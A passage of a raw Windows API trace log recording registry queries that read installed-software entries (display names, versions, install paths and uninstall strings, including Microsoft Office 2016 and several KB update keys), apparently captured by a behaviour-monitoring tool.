lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x13, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x13, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="16.0.4266.1001", lpcbData=0xdeb88*=0x1e) returned 0x0 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="Microsoft Office Professional Plus 2016", lpcbData=0xdeb88*=0x50) returned 0x0 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\Program Files (x86)\\Microsoft Office", lpcbData=0xdeb88*=0x50) returned 0x0 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Office Setup Controller\\OSETUP.DLL,1", lpcbData=0xdeb88*=0xc6) returned 0x0 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.726] RegQueryValueExW (in: hKey=0x250, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x1, lpData="\"C:\\Program Files (x86)\\Common Files\\Microsoft Shared\\OFFICE16\\Office Setup Controller\\setup.exe\" /uninstall PROPLUS /dll OSETUP.DLL", lpcbData=0xdeb88*=0x10a) returned 0x0 [0146.726] RegOpenKeyExW (in: hKey=0x220, lpSubKey="SchedulingAgent", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x254) returned 0x0 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x254, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x1d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegOpenKeyExW (in: hKey=0x220, lpSubKey="WIC", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x258) returned 0x0 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x1d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x1d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.727] RegQueryValueExW (in: hKey=0x258, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x258, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x258, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{0FA68574-690B-4B00-89AA-B28946231449}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x25c) returned 0x0 [0146.728] RegQueryValueExW (in: hKey=0x25c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.728] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{13A4EE12-23EA-3371-91EE-EFB36DDFFF3E}", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x260) returned 0x0 [0146.728] RegQueryValueExW (in: hKey=0x260, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x4, lpData=0xded98*=0x1, lpcbData=0xdeb88*=0x4) returned 0x0 [0146.728] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2151757", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x264) returned 0x0 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x31, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.728] RegQueryValueExW (in: hKey=0x264, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.729] RegQueryValueExW (in: hKey=0x264, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.729] RegQueryValueExW (in: hKey=0x264, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.729] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2467173", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x268) returned 0x0 [0146.729] RegQueryValueExW (in: hKey=0x268, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.729] RegQueryValueExW (in: hKey=0x268, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x9, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.729] RegQueryValueExW (in: hKey=0x268, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.729] RegQueryValueExW (in: hKey=0x268, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x268, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x268, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x268, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x268, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x268, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2524860", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x26c) returned 0x0 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0xa, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x30, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.734] RegQueryValueExW (in: hKey=0x26c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.734] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2544655", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x270) returned 0x0 [0146.734] RegQueryValueExW (in: hKey=0x270, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0x8, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x270, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2549743", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x274) returned 0x0 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x2c, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.735] RegQueryValueExW (in: hKey=0x274, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x27, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.735] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB2565063", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x278) returned 0x0 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x27, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x27, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x278, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x23, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegOpenKeyExW (in: hKey=0x220, lpSubKey="{1D8E6291-B0D5-35EC-8441-6616F567A0F7}.KB982573", ulOptions=0x0, samDesired=0x20219, phkResult=0xdef9c | out: phkResult=0xdef9c*=0x27c) returned 0x0 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="SystemComponent", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="WindowsInstaller", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x5d, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="ReleaseType", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="DisplayVersion", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="DisplayName", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="InstallLocation", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="DisplayIcon", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x0, lpcbData=0xdeb88*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="ParentKeyName", lpReserved=0x0, lpType=0xdeb88, lpData=0xded94, lpcbData=0xdeb84*=0x208 | out: lpType=0xdeb88*=0x0, lpData=0xded94*=0xe0, lpcbData=0xdeb84*=0x208) returned 0x2 [0146.736] RegQueryValueExW (in: hKey=0x27c, lpValueName="UninstallString", lpReserved=0x0, lpType=0xdeb8c, lpData=0xded98, lpcbData=0xdeb88*=0x208 | out: lpType=0xdeb8c*=0x0, lpData=0xded98*=0x35, 